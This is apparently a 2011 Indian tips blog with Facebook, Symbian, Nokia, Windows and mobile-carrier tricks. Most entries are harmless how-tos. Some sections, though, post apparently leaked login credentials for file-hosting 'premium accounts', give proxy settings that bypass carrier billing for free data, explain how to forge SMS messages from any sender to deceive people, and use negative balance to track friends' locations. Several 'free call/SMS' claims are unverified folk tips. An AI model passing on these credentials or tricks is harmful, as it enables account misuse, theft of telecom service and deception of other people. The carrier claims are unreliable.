It gets quite boring to keep updating your status using text when voice can express things so much better. That’s where this amazing Facebook application comes in, which lets you update your status, post voice messages on your friends walls and send voice messages to people.

The application is called MyMic and you’ll have to allow it access to your Facebook profile to make use of all it’s features. Just visit the application page and start using MyMic to send short voice messages or update your status. There is however a time limit for use of this service. You’ll only be able to record a message or status that is about 20 seconds long for free, but you can record a minute long message by paying for the service.




This application is child’s play, and very use to use. All you need is a microphone and something to speak into it!! Once your message is recorded, the application will ask you if you want to send it to a friend or just put it up as your status. Once you choose that you’ll be asked whether you’d like to post this new application on your wall and promote it, also you can customize settings such as who can see your Voice update.

Try it out, it’s a fun little app. And your friends don’t have to install anything to listen to your Voice message. It’s that simple.

Do you know of any such useful and easy to use applications on Facebook? Do let us know in the comments.

HOW TO UPDATE FACEBOOK STATUS MORE THAN 420 CHARACTER LONG

Today I was trying to share something with My facebook friends ( My facebook profile is like a mini blog for me). Once I finished writing my status update and hit the post button, Facebook gave my expected error:
Your status update is too long. The maximum Status length is 420 character, but it’s 1303 character long. But here is the trick which will let me update my Facebook status in more than 420 character.

This hack is pretty easy, all you need to do is: Upload an image with your status message and you can publish very long status message.

HIDE YOUR FRIENDS LIST FROM STRANGERS ON FACEBOOK

Privacy, one of the reasons which made some issues out of facebook but later fb got a lot of new settings for a user’s privacy. Now, a user has his control on almost everything in his profile, status, photos, albums etc. The user has the control of what he wants to share with everyone, friends, friends of friends etc. You can even manually hide a status from a single person or more. Did you know that you can even hide your friend list? If don’t then read on.
If you don’t want strangers to see your friend list then you can just hide it from them. It is very easy. You can use the enhanced Facebook privacy settings to modify your friend list’s visibility based on your choice. Let me show you the step by step tutorial on how to hide Facebook friends list.

1.Log on to your Facebook account.

2.Click on the “Account” on the top right and then click the 4th option “Privacy Settings”.

3.In the section “Connecting on Facebook” click “View Settings”.

4.You will see 7 options there. One of them would be “See your friend list” and there would be the options on how you can modify the visibility of your friend list.

When you click that option at the right side, you can change it to other 3 options(Friends and Networks, Friends of Friends, Friends only). You can even customize the visibility manually.

RECHARGE CODE FOR AIRTEL,IDEA,RELIANCE,VODAFONE,TATA DOCOMO,AIRTEL LATEST 2011 MARCH

Dear Readers all mobile operator have different recharge codes for card recharge tricks ,don’t get confused by remember this recharge codes list of codes form most of the network below

1.Aircel- *125*code No#
2.Idea- *223*code No#
3.Reliance- *305*code No#
4.Vodafone- *140*code No#
5.tata Docomo- *135*2*code No#
6.Airtel- *120*code No#

how to recharge airtel,idea,reliance,vodafone,tata docomo, airtel
Recharge code for airtel,idea,reliance,vodafone,tata docomo, airtel

Just add the other network recharge codes by comments

Friday 11 March 2011

SIGNING SIS/SISX FILES FOR SYMBIAN S60 PHONES – ONLINE, PC AND MOBILE SIGNING GUIDE

There are basically two methods to sign (Embedding a trusted certificate signature) an unsigned Symbian app/game (sis/sisx file) – Online (At various sites) or offline (At computer) by the user. In simple words you can either get your file signed online or sign it yourself at PC. The second method is easier and more popular. I will describe the two methods one by one:

1. ONLINE SIGNING OF sis/sisx FILES – Following are some websites that offer this service:
A) “Open Signed” via Symbian Signed (The official signing site)
B) Online signing at OPDA (Require registration)
You will have to give your phone’s IMEI number and upload the unsigned file at the above sites and then wait until it is signed and available for download.

2. OFFLINE SIGNING AT PC/MOBILE BY SIGNER SOFTWARE – This method uses a PC/Mobile application (Called a “Signer” or “Sign tool”) to sign an unsigned app with the help of a personal “Security Certificate” and a “Key” file for a specific IMEI (The cert. and key files will be specific for a single IMEI number). There are several sites offering the service to provide (Generate) “Certificate” and “key” file for any IMEI. Some of these are in Chinese or Russian so better translate them in your language using Google translate):

A) cer.s603rd.cn – require no registration but in Chinese.
B) cer.opda.cn/en – In English language. Also provide online app signing service
C) s60certkey.com – In English, “Sign Up” (Registration) is required to get certificate and key.
D) http://allnokia.ru/symb_cert - No sign up required but in Russian.
E) http://isign.imobile.com.cn/ – Chinese site

Go to any of the above sites (Register if required). Enter your phone’s IMEI number (Press *#06# at phone’s idle screen to know its IMEI) at the given field (Fill up other info if required) and then wait for 12-24 hours (Sometimes even longer). Visit the site again next day (Login if required) and again enter your IMEI. If your certificate and key have been generated, a link will appear telling you to download it. I have personally tested the first two sites.
After downloading your personal security certificate and key file you will need a “Signer” application that will sign sis/sisx files using the above two files. First two sites also provide such apps. (Alternatively you may download PC signer from HERE, change the language of its interface by clicking last tab and choosing “English” and then restart it ).
Now make a new folder (Of whatever name like “Signer folder” and preferably at Desktop) Place the downloaded signer app, certificate file, key file and the unsigned sis/sisx file in the just created folder.
Now open the Signer software (Right click on the signer exe file and select “Run as administrator”).
Select unsigned sis/sisx file, “cert” file and “key” file as directed and click “Sign”.
After a while a signed file will be generated with some suffix added to the original name (Like xyz_signed or some other weird name) and that will be your signed sis/sisx file ready to be installed in the phone. A warning will appear when installing these files saying “This file is for development purpose only and may seriously damage your device”, just don’t worry about this and continue with installation.
NOTE: If you are having problem with the above signer then try this one SignSis_GUI (Easier to use)
3. SIGNING AT PHONE ITSELF: “Free Signer” is a free application for S60 3rd and 5th edition phones that can be used for signing sis/sisx files at phone itself (Just like “Signer” software for Windows as described above). However “Free Signer” will also need the “Certificate” and “Key file” to sign the unsigned sis/sisx file (As described in step 2 above). “Free Signer” is itself an unsigned app (Download from HERE) and needs to be signed to install on phone. Therefore you will have to follow the above step 2 to sign it first. Once “Free Signer” is signed, install it in your phone. Transfer your “Certificate”, “Key” and unsigned sis/sisx file to phone. Run Free Signer from phone's menu and follow the instructions to sign files.

NOTE however that the files signed by any of the above 3 steps can only be installed in the phone with IMEI for which the cert and key files were generated. Also files signed through above procedure will have limited security capabilities (Can’t access system folders and files etc) because it is an “Open Signed”, IMEI restricted process without a “Publisher ID”. If you want to sign your files with an all capability developer certificate then you will have to register at Symbian Signed official site and follow their guidelines.
One last thing, besides signing, you can also “Unsign” (Remove certificate) a signed sis/sisx file with the above “Signer” apps (Both via PC signer and “Free signer” of phone).


Original post at DiGi-PASSION

REMOVING SYMBIAN VIRUS - X-PLORE vs. SYSTEM EXPLORER

Yesterday I was given another similar, virus infected Nokia 6600 to be cleaned. The phone’s battery was draining too fast and it was sending automatic Bluetooth connection requests to other mobiles. Rather than choosing the conventional method (Formatting the phone and memory card), I decided to experiment a bit and work on a different line of action. The strategy was, to find and delete the virus files manually.
To start with, I installed X-plore in the phone and searched for the virus related files and folders. Soon I found the culprit files (cpun.exe, cpun.mdl and some other suspicious looking files). I knew that, as long as the virus is running as a process, these files cannot be deleted (The virus will recreate them again) and hence the virus process must be terminated first. To do this I opened ‘Processes’ under ‘Menu/Tools’ in X-plore. There I found above named process and bingo, I thought the battle is won. But to my horror, when I tried to terminate the virus process, X-plore crashed. I tried again and again but X-plore crashed every time. Frustrated, I tried FExplorer but it failed too. As a last resort I installed and used another file manager application ‘System Explorer’ and to my delight it terminated the culprit process without any hassle. After this I deleted all the virus related files and the phone became perfectly fine. Note however that if you are not familiar with the phone’s files and processes then please DO NOT attempt to terminate any process or delete any file suspecting it as a virus. This way you may harm your mobile and it is always safer to choose the conventional way to remove the virus.
Currently, System Explorer is compatible with Symbian S60 1st and 2nd edition phones only. (Download)
Anyway, this experiment also proved that ‘System Explorer’ is more powerful than X-plore (Otherwise the best file manager app), in terminating the processes. Are Lonelycatgames guys reading?

HOW TO REMOVE SYMBIAN (S60v1 AND V2) VIRUS INFECTION ?

The easiest and sure shot way of removing most mobile (S60 1st and 2nd edition only) viruses is to format the phone and memory card both.
Because the virus usually runs as a system process and resides in the memory, one cannot delete all the files related with virus while the phone is on. Usually virus related files have bizarre names (Like kktuqwe.exe, gdv.mdl etc) with extensions .exe .mdl and/or .sis. With the help of X-plore these files can be located in C:\(root) C:\System\Recogs, C:\System\Programs, C:\System\Apps, E:\(Root), E:\System\Apps, E:\System\Recogs, E:\System\Programs (And other hidden system folders). You can find and delete them easily but unfortunately the virus (That is still running) will recreate them instantly. So the best way is to format the phone, however formatting the Memory card is optional.

1. Before formatting the phone, backup your contacts and other data on memory card and/or PC. Now remove the memory card and format the phone (Read HERE how to format?).
2. If you don’t want to format the memory card then remove it before formatting the phone. Now connect it to your PC and scan with a good antivirus (Avast is the best and free antivirus that detects and removes most mobile viruses). Delete any infection detected. DO NOT re-insert the memory card before formatting the phone otherwise the virus will again infect it.
3. If you want to format memory card also, format it through PC first and then reformat it through formatted phone.

NOTE: If you can’t see hidden files in X-plore then proceed as follows
1. Run X-plore,
2. Press 0 (Zero) on keypad (Or go to Menu/Tools/Configuration)
3. Check the first 4 boxes
Press back and now you can see the hidden system files.
Most of the mobile antiviruses, I used to remove the virus, failed miserably, may be they are still not as good as their desktop counterparts. So in my opinion having an antivirus running on your Symbian phone (Having meager RAM) will do nothing but to slow down the device. One more reason for not having a mobile antivirus is that mobile viruses are not as sophisticated and sneaky as their Windows siblings and they just cannot enter your phone without your permission.

HOW TO FORMAT SYMBIAN S60 PHONES - NOKIA FORMATTING CODES

To format your S60 phones follow the below steps..
If your phone is switched on dial the below number.

*#7780# or
*#7370#
Phone will ask for confirmation and security code (Default security code is 12345),

Note :Your datas will be erased.

Second method is hard reset.To do so follow the below steps

If your phone is not switch off ,Switch off it..
 Press and hold following three keys simultaneously
Green Key (OK or Number Dialing key), Star key (*) and Three key (3 number key)

Press and hold the keys and switch on your phone by pressing power button.Hold the three buttons until the format screen appears

Now your phone gets formated..

A SIMPLE TRICK TO HIDE ANY FILE (IMAGE, VIDEO etc) IN SYMBIAN S60 PHONES

Simple method to do the same without the help of any such encryption software:
1. Install X-plore if you don’t have it already on your phone.
2. Run X-Plore and go to the file’s location (Like Image files in “E:\Images”), you want to hide. Now select the file and go to “Menu\File\Attributes”. Now change its “Attributes” to “Hidden”. Another way to hide the file is by placing it in a hidden folder (like in “System” folder). For this “Cut” the file from its existing location and “Paste” inside the “System” folder. Is not that simple?
Now the above file will not show up in Gallery. However you can see it in X-Plore.

HOW TO DETECT A FAKE SMS/CALL IN SYMBIAN S60 PHONES ?

There are many mobile apps to create fake SMS and calls (That simulate real message/call as if a real message arrived via network). You can read about these in the post "Create and send fake sms to your own mobile free". Once a SMS is created via these apps (In inbox/Sent folder) you just can’t differentiate whether it is a fake or a real one. However I have found a simple way to detect such SMS/Calls in Symbian S60 phones. (Not sure whether it will work in other mobiles like iPhone, Blackberry, Android etc). Here goes the detection method:
1. Go to “Messages” in phone
2. In Messages navigate to the message you suspect as fake, highlight that message and go to “Options/Message details”. Note down the date and time of message.
3. Now go to “Log” (Call log app in menu)
4. Press Navigation key to “Right” (To access all calls/data/message detail log)
5. Press navigation key down until you reach the date and time noted in Step 2 above
6. If an entry of that SMS/Call is present at that time then you can be sure it was a genuine SMS/Call arriving via network. If however the entry is not present in log then it was definitely a fake message/call.
The logic behind this trick is simple: A fake SMS/Call does not leave an entry in “Log”. Symbian phone’s inbuilt “Log” app records all the network activity (Incoming/Outgoing calls/SMS/Data along with numbers and duration). As the fake SMS/Call is a network independent activity, it is (Fortunately) not recorded by log. So it is a challenge for developers of such apps to rectify this in upcoming versions.
Note: To utilize the “Log” in the above method, the log duration must be set to 10 or 30 days (Go to Log/Options/Settings/Log duration). If you know any other method to detect fake SMS/Call please share it here.

CREATE AND SEND FAKE SMS TO YOUR OWN MOBILE FREE (EVEN IN OFFLINE MODE)

How about creating any message (From any name and number you choose) in your (Or any other) mobile and send it to your own inbox and that too without any network and operator (In offline mode, no SIM required)??? Impossible? No, actually it is easier than sending a real SMS. This is called a fake SMS, a prank that will astonish even an unaware mobile expert. Sometimes for fun and sometimes to make someone believe something, this trick is awesome.
So to get started, you need to have Active File installed in your Symbian S60 phone (Download from HERE). Active File is a free file explorer app (Just like X-Plore and FExplorer) for Symbian mobiles (All editions and versions). Besides, Active File can do a whole lot of other things as well.
Now to create and send a fake SMS, run Active File and go to “Options/Tools/Create fake SMS” (Here you can set parameters like sender’s name, mobile number, text of message, date, time, number of times sms will be sent, set as read status and target folder (Inbox, Outbox, sent, draft).
Fill the required fields and go to “Options/Create”, simple and yo!!! Your message tone will ring up the next moment (Or at the set time) and a “genuine” SMS (That you just created yourself) will flash as a “1 new message”. There is no way theses messages can be distinguished from other SMSes. Now time to have some fun with your friends.
NOTE: This app is available only for Symbian S60 phones (S60v2, 3 and 5), so no luck for other OS phones (Java, Windows mobile, iPhone, Blackberry, Android etc). If however you know about any such app for other phones, plz share it here

FORMAT/HARD RESET A BRICKED NOKIA N8

Here is the trick to hard reset or format your Nokia N8
To do so Follow the instructions given below:

1. If your phone is not turned off,Turn off the phone

2. PRESS and HOLD “Volume Down Key”, “Camera Key” and the “Menu Key” simultaneously

3. Keep hold the three keys and power on the phone.Hold the keys until the phone display gets on..


Now your Nokia N8 is formatted enjoy...

AIRCEL FREE GPRS TRICK 2011

Just make your home page as below url


0.facebook.com.bypass-proxy.appspot.com/ur site
and use the following settings



-Acess point name-aircelwap

-proxy->192.168.35.201

-port->8081

Try at low balance..

FREE SMS SENDING TRICK FROM YAHOO MOBILE MESSENGER

Free SMS:

As we all know yahoo has provided extra special additional features to its messenger inturn there also possibilty of sending free sms from yahoo mobile messenger,since yahoo messenger is largely used,it also made possible to send free sms.just follow how to send free sms from your yahoo mobile messenger.

Procedure:

* Download yahoo messenger applicable to your mobile phones
* Or Visit http://m.yahoo.com/messenger and sign in to your account.
* And now you can find send message option at the top of your mobile screen.
* now send free SMS instantly from your mobile messenger.

Note: Yahoo messenger works only with gprs enabled mobile phone.

Thursday 10 March 2011

HOW TO ADD EXTRA ITEMS IN MY COMPUTER

Windows provide many tweaks and customizations by default. But to access these settings or perform various other tasks we have to visit a lot of places or locations hence wasting a bit time.

If you want to add useful places and options to My Computer for easy access then Computer Customizer is a small for your convenience.

Computer Customizer is a windows freeware utility to add items to My Computer. It is easy to use with a single window tabbed interface. It provides lots of items categorized under two tabs.

To add any item of your choice, you have to select the items from the given menu. Multiple items from both the tabs can be selected at once before applying the settings.

Once the settings are applied, you do not require to log off or restart system to make the changes appear. Just go to My Computer and you will find the additional items beneath the regular items already present

FIREFOX 4 RC RELEASED

After releasing twelve Beta versions, Mozilla has released their first RC (Releases Candidate) today. The RC is now available to download for Windows, Linux and Mac based users.



Firefox 4 claims that its six times faster than any of its previous releases. It has several new features like Firefox Sync, multi-touch support (Windows 7 only), JavaScript engine resigned, hardware accelerated graphics for Windows and Mac and HTML 5 support .

To know each and every detail as to what’s new in Firefox 4 you can refer to Firefox 4 official Page

Although you can download the latest version of the RC from http://ftp.mozilla.org/ but we here at Blogsolute make things simple for you. So download the RC for you OS from the below provided direct download links.
Direct Download Links for Firefox 4 RC

Download for Windows

Download For Mac OS X

Download for Linux

GOOGLE CHROME 10 STABLE FINAL VERSION DOWNLOAD

After three weeks of beta testing, Google has released the stable version of Chrome 10. This browser which had grabbed headlines for being extremely fast, has reportedly become even faster.

It features a new and improved settings manager, encrypted password syncing and a multitude of other features. It makes use of the V8 Javascript engine, thereby making it much faster than other browsers. The settings manager now comes with its own search box, to search for any particular setting as you type.

Also, Chrome’s sandbox has been extended to include the integrated flash player, thus making the browser more secure. The password sync enables retrieval of passwords on any computer, and it can be encrypted either by the google account password or a separate keyword.

If you have not yet tried Chrome, do try it, It is definitely fast, maybe more than the other browsers, but the multitude of features do warrant a looking at.



Download now

HOW TO ENABLE RIGHT CLICK IN WEBSITES WHICH IS DISABLED BY ADMIN

You are probably sometimes tried to save images or copy the contents of the website that forbid their use of the right-click. Most websites use javascript to prohibit the use of the right-click , so to enable it you should disable the javascript.


There are many ways to do ti , the simplest by my opinion is using Web Developer 1.1.9 , firefox add-on .

1) Downlaod Web Developer 1.1.9 from this link



2) Click Disable button



3) Select Disable Javascript


4) Again select “All Javascript” option.

TRANSFORM YOUR WINDOWS XP IN TO WINDOWS 7

If you are using Windows XP and want to experience Windows 7 without installing then here is Seven Remix XP transformation pack to transform Windows XP to Windows 7.With this simple app you can make your XP look like Windows 7 in just few clicks. It supports Windows XP, Windows 2003, Windows Media Center Edition and some other flavors of XP. Will work with only 32 bit edition of Windows.

Just download it and install .

Download Seven Remix XP and transform your windows xp

HOW TO SECURE YOUR WIFI TO BEING HACKED

How to secure your Wifi

just simple by easy three steps

1-Enable WPA2 encryption and MAC filtering

how to enable wpa2 >open browser

>192.168.1.1(ur default
gateway)
>>

<< 2 - put ur admin password - after it ur modem config has been open - go to setting - wireless - change wireless SSID to any name >>>
<<<
3 :goto wireless security tab

-security mode select WPA2 personal

- then WPA algorithms select TKIP+AES

-add password

-save setting

NOW GET RAILWAY INFORMATION FREE WITH THIS TOLLFREE NUMBER

friends
Now get Railway informations free

from just one call

just dial the below tollfree number and enjoy

1800111139

and get at all information

Tuesday 8 March 2011

RENAME YOUR RECYCLE BIN

Rename Your Recycle Bin

Hey Guys just follow thse simple steps and change the name of your Recycle Bin(where temporarely deleted files are stored)
1)Goto 'start' menu and Choose 'Run' command.
2)Type 'regedit' (without inverted commas). U will see Registery Editor Window on Ur Screen.
3)Now, On the Left Hand Side of the Window you'll see a Tree of folders Just DoubleClick on the HKEY_CURRENT_USER folder>Now in the new folder Tree DoubleClick on the 'Software' folder > then DoubleClick on 'Microsoft' folder>'Windows' folder>'Current Version' folder>'Explorer' folder>'CLSID' folder.
4)Now, You will see a Tree of 3 or 4 folder(don't worry about the no. of folders). Just Click on the folder : '{645FF040-5081-101B-9F08-00AA002F954E}'.
5)Finally, after Clicking on '{645FF040-5081-101B-9F08-00AA002F954E}' folder Goto the Right Hand Side of the Same window and Double Click On the Default Option and Write in the name You want for Your Recycle Bin
e.g. :- Trash #. CLick O.K. button. Goto Your Desktop and Refresh the Desktop and See the magic. Your Recycle Bin has been Renamed.

SUBMITTED BY

Ashwin

AIRTEL FREE CALL TRICK 2011 HACKED AIRTEL

Airtel SIM TO SIM free callings tricks and diplomacy booster diplomacy upcoming new airtel diplomacy
airtel users now make free calls form your new airtel sims
AIRTEL FREE Call
(New SIM)
send:
FNF to 170(FREE) or
NEW to 750(FREE)
or
YES1 to 511(FREE)
*100% Effective*

Monday 7 March 2011

FREE SMS ON VODAFONE,HACKING TRICK

Vodafone Free 100 LOCAL/STD SMS Trick For 1Rs With NO VALIDITY:- 1.Send ‘ACT BONUS 1′ To 144 2.Send One Message To Any Number 3.Send ‘CAN BONUS 1′ To 144

NOKIA SECRET CODES HACKS

Here i have found list of some Nokia Mobile Secret Code

Nokia-secret codes
Nokia 3310

To check IMEI:
press *#06#

Software Version of the mobile:
Press * # 0000 # and you will see software version, manufacture date and phone model.

Warranty:
press *#92702689#, and you will see:

1 IMEI
2 Made MM/YY (manufacture date)
3 date of purchase (this can be edited, but once it is set, it cannot be altered anymore).
4 Repaired (date of repair, in case it has been repaired)
5 Transfer user data

EFR:
*3370# EFR will be activated once the phone is restarted (turned off, then turned on).
#3370# EFR will be deactivated once the phone is restarted.
*4720# Half Rate will be activated once the phone is restarted.
#4720# Half Rate will be deactivated once the phone is restarted.

Nokia 3330 secret codes and tricks

To see IMEI:
press *#06#

Software Version:
Press * # 0000 # and you will see software version, manufacture date and phone model.

Warranty:
press *#92702689#, and you will see:

1 IMEI
2 Made MM/YY (manufacture date)
3 date of purchase (this can be edited, but once it is set, it cannot be altered anymore).
4 Repaired (date of repair, in case it has been repaired)
5 Transfer user data

EFR:
*3370# EFR will be activated once the phone is restarted (turned off, then turned on).
#3370# EFR will be deactivated once the phone is restarted.
*4720# Half Rate will be activated once the phone is restarted.
#4720# Half Rate will be deactivated once the phone is restarted.

Nokia 3410 secret codes

To see IMEI:
press *#06#

Software Version:
Press * # 0000 # and you will see software version, manufacture date and phone model.

Warranty:
press *#92702689#, and you will see:

1 IMEI
2 Made MM/YY (manufacture date)
3 date of purchase (this can be edited, but once it is set, it cannot be altered anymore).
4 Repaired (date of repair, in case it has been repaired)
5 Transfer user data

EFR:
*3370# EFR will be activated once the phone is restarted (turned off, then turned on).
#3370# EFR will be deactivated once the phone is restarted.
*4720# Half Rate will be activated once the phone is restarted.
#4720# Half Rate will be deactivated once the phone is restarted.

Nokia 3510

To see IMEI:
press *#06#

Software Version:
Press * # 0000 # and you will see software version, manufacture date and phone model.

Warranty:
press *#92702689#, and you will see:

1 IMEI
2 Made MM/YY (manufacture date)
3 date of purchase (this can be edited, but once it is set, it cannot be altered anymore).
4 Repaired (date of repair, in case it has been repaired)
5 Transfer user data

EFR:
*3370# EFR will be activated once the phone is restarted (turned off, then turned on).
#3370# EFR will be deactivated once the phone is restarted.
*4720# Half Rate will be activated once the phone is restarted.
#4720# Half Rate will be deactivated once the phone is restarted.

Nokia 5110

To see IMEI:
press *#06#

Software Version:
Press * # 0000 # and you will see software version, manufacture date and phone model.

Warranty:
press *#92702689#, and you will see:

1 IMEI
2 Made MM/YY (manufacture date)
3 date of purchase (this can be edited, but once it is set, it cannot be altered anymore).
4 Repaired (date of repair, in case it has been repaired)
5 Transfer user data

EFR:
*3370# EFR will be activated once the phone is restarted (turned off, then turned on).
#3370# EFR will be deactivated once the phone is restarted.
*4720# Half Rate will be activated once the phone is restarted.
#4720# Half Rate will be deactivated once the phone is restarted

PLAY MOVIE ON PAINT

Play movie on paint ....... play movie on microsoft paint simple first hit the print screen button on the keyboard when then media files are playing then open paint and paste by pressing ctrl+v (paste key) voila the movie starts on the paint application

Submitted by

ASHWIN

Sunday 6 March 2011

FREE CRICKET SCORE ON RELIANCE MARCH 2011 TRICK

Get free cricket score on reliance follow the instructions
>Dial *123*123#
>Get cricket pack at 0 for 3 days.
>After two days active again by dialing *123*123#
>Enjoy

Saturday 5 March 2011

UNIBYTES PREMIUM ACCOUNT

user: www.letitbitkeys.ru@yandex.ru pass: 17788154

TURBOBIT PREMIUM ACCOUNT

login : dev.spiritix.eu@dev.spiritix.ru pass : dev.spiritix.eu

FILEMACHINE PREMIUM ACCOUNT HACKED

FILEMACHINE PREMIUM ACCOUNT HACKED
login: neo1100 pass : 15011979

IDEA PUNJAB FREE CRICKET SCORE

Just dial *555*5# from your idea phone and get free cricket score instantly on your phone via sms.
The thing you have to note when dialling this number is your account balance should be less than 50 paise.If not you will be charged..

FREE SMS ON DOCOMO

To get free sms tata docomo follow the below steps
1)sms JOIN to 121.
2)You will get confirmation message.
3)After that, sms QUIT to 121.
4)Check message balance by sending an sms BAL to 121.

You will get 50 sms for one week

FREE 3G FOR AIRCEL USERS

To get free 3g on your aircel just send a message,
Type START 3G and send to 121 and Get free 250 Mb data at 3G speed.
Also get 50 min free video calling.
(It is only for 3G users)

VODAFONE free GPRS OFFER MARCH 2011

Send BUDDY your number to 144.
You will get 350 MB data for 1 day.
(Work in some states)
Try

UNLIMITED LOCAL CALL IN RELIANCE

Recharge with 49 and get reliance to reliance free local unlimited calling for 7 days,hurry up...

LOCATE YOUR FRIENDS EXACT LOCATION USING AIRTEL FREE

Follow these simple instructions

note:- don't use your personal and useful sim bcoz balance minus me chala jayega

1. Keep your balance below Rs 1/-

2. Dial *321*88#

3. Subscribe airtel Friend locater.

4 .Airtel now charge Rs 10/- for 10 days..

5. Now your balance going to minus..

6. But you can add your friends to your locater and locate them exact location.

7. There after don't recharge

Friday 4 March 2011

FREE CALL ME TUNE ON DOCOMO,TATA

Friends here is the Process for activate Call me tunes in DOCOMO with 1 month free subscription,after one month repeat the same process.

Step1: If u are already a Dcm callmetune subscriber,than deact your Callmetune first by dialing 155223.

Step2:Now dial 543211999 for get 1month free CALLMETUNE subscription.After subscribe wait for confirmation msg.

Step3:when u get the confirmation msg,then dial 54321199899 for select your favorite CT (Bengali&HINDI latest/hitz/old) as callmetunes .

You can set more than One song for totally free

HOW TO MOD .JAR FILE USING PC

You Will Need Only Two Software For This And One Is Already In Your Pc

1. Winrar

As .Jar File Is A Archive
So Winrar Can Open It

2.Notepad

STEPS:
1.Open Any .Jar File With Winrar (You Will See Many Class File And Some Images)

2.Extract a .Class File To Your Desktop

3.Now Make Notepad To As A Default Software To Open .Class File(Bingo Now That’s All )

4.Now Open Jar File With Winrar Then Open .Class File It Will be Open In Notepad Now Edit it.

5.Now Save The Archive(Click On Close It Will Ask Save Or Not. Save it)

Your modded aplication is ready enjoy

Wednesday 2 March 2011

REMOVE TEXT FROM DESKTOP ICONS IN WINDOWS

Sometimes, you might have thought to remove the under icon text of your Desktop Icons as it looks quite annoying especially for the kind of icons like, Internet Explorer, Google Chrome, Safari, Mozilla Firefox, iTunes, Windows Media Player etc. Nowadays, the Icons represent the program quite nicely, especially in the OS like Windows 7 & Vista, there is a very less need to have under icon text.

So, to remove the under icon text, there is a quite nice and very less talked about shortcut, that allows you to remove the under icon text quite nicely.



Here is a step-by-step procedure to remove the "Under Icon Text"

Press Alt+255

* Right click on the icon
* Select option "Rename"

* Then press "Alt+255"
(Remember that while pressing 255, the "numlock" should be on and use side dedicated number keys, rather than using the number keys located above the keyboard. In the case of some laptops not having the dedicated number keys, can use the above number keys by turning on the "Numlock")

* That's all.
* Now the icon should look like,

The Icon without Text

* If you want to revert the changes made, just right click icon and rename it.
(You will need to provide the administrator password or permission to do so.)


Submitted by

Hackinghero.blogspot.com

Tuesday 1 March 2011

LATEST AIRTEL FREE GPRS TRICK IN MARCH 2011

APN: airtelgprs.com
Proxy/ip address: 80.239.242.253
Port: 80
Now in operator trick of any operamini handler version do as follows:
 Proxy type: HTTP
Proxy address: 0.facebook.com
Leave others as it is.
Initialize it with a paid gprs. After installing you can browse free with this setting. No downloading facility.

Submitted by
                    mytricks.wap.sh